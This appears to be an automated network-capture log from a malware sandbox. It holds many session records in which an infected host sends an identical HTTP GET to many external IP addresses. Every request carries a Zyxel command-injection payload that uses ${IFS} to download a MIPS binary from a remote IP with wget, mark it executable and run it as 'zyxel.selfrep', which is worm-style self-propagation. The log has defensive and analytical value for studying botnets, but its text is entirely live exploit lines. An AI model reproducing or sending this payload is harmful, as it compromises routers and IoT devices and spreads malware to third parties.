                                                Jan 28, 2024 10:16:17.692205906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2359192.168.2.2349008212.60.12.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692214966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2360192.168.2.2357798180.197.159.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692275047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2361192.168.2.235218678.140.36.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692300081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2362192.168.2.235696660.115.192.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692322969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2363192.168.2.2354756122.100.160.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692385912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2364192.168.2.2338368193.42.25.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692394972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2365192.168.2.2360160213.168.56.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692431927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2366192.168.2.234086620.94.2.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692471981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2367192.168.2.233317845.222.133.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692481995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2368192.168.2.234406023.91.206.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692483902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2369192.168.2.2353896150.23.40.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692528963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2370192.168.2.2350292166.253.58.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692572117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2371192.168.2.2333312174.247.91.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692580938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2372192.168.2.2338420170.123.203.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692627907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2373192.168.2.23504062.238.13.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692660093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2374192.168.2.233612290.164.15.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692676067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2375192.168.2.2345654119.127.131.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692703962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2376192.168.2.2355666223.163.173.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692739964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2377192.168.2.2337354173.153.230.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692766905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2378192.168.2.2336810192.226.173.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692785978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2379192.168.2.2354404102.151.79.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692797899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2380192.168.2.234139086.194.206.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692854881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2381192.168.2.235379446.112.142.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692857981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2382192.168.2.2360642133.189.38.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692884922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2383192.168.2.234742460.0.199.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692910910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2384192.168.2.234107619.116.104.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692950964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2385192.168.2.2346646103.163.7.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692980051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2386192.168.2.2352126207.181.139.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.692992926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2387192.168.2.234990246.209.173.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693005085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2388192.168.2.2357478174.185.151.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693037987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2389192.168.2.2350868216.121.65.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693067074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2390192.168.2.2353836120.53.249.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693098068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2391192.168.2.2334262161.80.211.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693130016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2392192.168.2.2344744136.20.239.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693154097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2393192.168.2.235574617.121.69.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693173885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2394192.168.2.2347934154.41.164.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693202972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2395192.168.2.234212835.82.167.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693223000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2396192.168.2.2333596107.193.150.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693233013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2397192.168.2.2356902207.61.15.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693269014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2398192.168.2.234524076.113.6.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693285942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2399192.168.2.2343804189.243.95.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693317890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2400192.168.2.2343818205.87.145.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693352938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2401192.168.2.2343754195.147.196.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693381071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2402192.168.2.2346964124.49.126.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693391085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2403192.168.2.2335644136.24.52.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693417072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2404192.168.2.234381486.192.43.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693447113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2405192.168.2.2336974101.130.241.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693475962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2406192.168.2.234148860.58.15.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693496943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2407192.168.2.2336286144.232.149.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693542004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2408192.168.2.235420283.86.40.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693573952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2409192.168.2.2350178148.234.140.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693609953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2410192.168.2.235663231.188.230.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693613052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2411192.168.2.2334778141.140.121.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693639040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2412192.168.2.2343946181.132.103.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693681002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2413192.168.2.2358118209.31.216.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693725109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2414192.168.2.233748894.198.151.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693762064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2415192.168.2.234477613.110.100.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693763018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2416192.168.2.233722278.174.36.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693804026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2417192.168.2.23453742.144.140.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693825006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2418192.168.2.234588017.37.195.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693862915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2419192.168.2.233498825.68.178.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.693895102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2420192.168.2.2335504168.34.224.238443
                                                TimestampBytes transferredDirectionData
